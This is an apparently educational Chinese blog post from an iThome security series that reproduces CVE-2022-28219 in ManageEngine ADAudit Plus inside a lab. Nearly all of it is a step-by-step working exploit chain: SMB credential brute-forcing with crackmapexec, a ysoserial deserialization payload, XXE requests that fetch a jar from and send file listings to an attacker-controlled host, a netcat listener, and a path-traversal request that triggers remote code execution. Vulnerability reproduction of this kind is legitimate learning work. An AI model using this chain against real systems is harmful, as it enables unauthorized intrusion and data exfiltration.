iT邦幫忙

2022 iThome 鐵人賽
DAY 29
0
影片教學

從建立環境、驗證漏洞、感受漏洞來學習資安系列 第 31

Day29 - 這是我最後的漏洞了!收下吧!- 攻擊開始!

14th鐵人賽 cve-2022-28219 crackmapexec
1220 瀏覽

  • 分享至 

  • xImage
    •  

Yes

建立步驟如下 :

  1. 打開上次建立的 Domain Controller (Window Server 2019)
  2. 下載檔案 ManageEngine_ADAudit_Plus_x64.exe
  3. 點擊安裝即可
  • 接著是要進行攻擊,流程一樣參考上述的參考資料,該軟體服務本身有不安全反序列化弱點,主要原因是使用 Cewolf 套件且本身的設定值可以觸發反序列化。但這個反序列化的檔案需先透過 XXE 攻擊手法進行上傳,然後列舉出檔案路徑位置,最後再丟給不安全反序列化的觸發點進行 RCE 的控制。但有個關鍵點在於 XXE 的攻擊需要取得該 Domain 的名稱,但是該如何知道呢? 有套工具叫做 crackmapexec 可以用來做 smb 的帳號密碼暴力破解,在破解過程中就可以得到該網域的域名了。 /images/emoticon/emoticon39.gif

步驟如下 :

  1. 打開 Ubuntu 作為本次的攻擊機
  2. docker pull byt3bl33d3r/crackmapexec
  3. docker run --rm byt3bl33d3r/crackmapexec -h
  4. docker run --rm -it byt3bl33d3r/crackmapexec smb "Your IP" -u admin -p admin # 取得域名
  5. 打開 Postman 方便之後作攻擊用
  6. 關閉 Window 的防火牆設定
  7. git clone https://github.com/Y4er/ysoserial.git
  8. cd ysoserial
  9. mvn clean package -DskipTests # 這邊 javac 要用 jdk 1.8.0_342 進行編譯
  10. java -jar ysoserial-0.0.6-SNAPSHOT-all.jar 2>&1 | grep "CommonsBeanutils192NOCC"
  11. java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils192NOCC "curl http://IP:Port" > upload.jar # 這邊 java 要用 jdk 1.8.0_342 去執行
  12. java BlockingServer 8080 upload.jar
  13. 打開 Postman 設定相關參數
POST http://IP:8081/api/agent/tabs/agentData
Content-Type: application/json

[
    {
        "DomainName": "你的域名",
        "EventCode": 4688,
        "EventType": 0,
        "TimeGenerated": 0,
        "Task Content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE foo [<!ENTITY ssrf SYSTEM \"jar:http://IP:Port/upload.jar!/file.txt\"> ]><foo>&ssrf;</foo>"
    }
]
  1. python2 xxe-ftp-server.py Your_IP 8081 2121
  2. 打開 Postman 設定相關參數
POST http://IP:8081/api/agent/tabs/agentData
Content-Type: application/json

[
    {
        "DomainName": "你的域名",
        "EventCode": 4688,
        "EventType": 0,
        "TimeGenerated": 0,
        "Task Content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>  <!DOCTYPE data [ <!ENTITY % file SYSTEM \"file:///C:/Users/Administrator/AppData/Local/Temp\"> <!ENTITY % dtd SYSTEM \"http://IP:Port/data.dtd\"> %dtd; ]> <data>&send;</data> "
    }
]
  1. nc -lvp 8889
  2. curl http://IP:Port/cewolf/a.png?img=/../../../../../../../../../Users/Administrator/AppData/Local/Temp/"你的檔案名稱" # 觸發 RCE
  • 呼,終於測試完最後一個漏洞了~~ 是不是感覺到很有成就感呢? /images/emoticon/emoticon42.gif下一次就準備迎接最後一天的文章,內容會包含之前出的期中 CTF 的解決方法以及說明一些關於學習資安、製作頻道的緣由。/images/emoticon/emoticon58.gif

上一篇
Day28 - 這是我最後的漏洞了!收下吧!- 建立 AD 環境
下一篇
Day30 - 灑花完結篇 - 期中考 CTF 解題以及為何我要建立資安頻道
系列文
從建立環境、驗證漏洞、感受漏洞來學習資安37
  1. 33
    Day31 Spring Security 又(?)有漏洞惹~~ 使用個 forward 功能臭了嗎?!
  2. 34
    Day32 來建立看看號稱影響程度直逼 Log4Shell 的漏洞 Text4Shell ~ !
  3. 35
    Day33 跌落神壇,一度被高估的 openssl 漏洞 (CVE-2022-3602) 到底是怎麼回事呢?
  4. 36
    Day34 - 沒時間解釋了~~ 趕快上車更新 VS Code 啦~~(CVE-2022-41034)
  5. 37
    Day35 - VSCode 又是你,而且現在居然還沒辦法修補這個漏洞QQ (CVE-2022-45025)
完整目錄
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言
iThome鐵人賽
參賽組數
1064
團體組數
40
累計文章數
22127
完賽人數
595
iT+看影片追技術 看影片追技術 看更多
熱門tag 看更多
15th鐵人賽 16th鐵人賽 13th鐵人賽 14th鐵人賽 12th鐵人賽 11th鐵人賽 鐵人賽 2019鐵人賽 javascript 2018鐵人賽 python 2017鐵人賽 windows php c# windows server linux css react vue.js
熱門問題
熱門回答
熱門文章
IT邦幫忙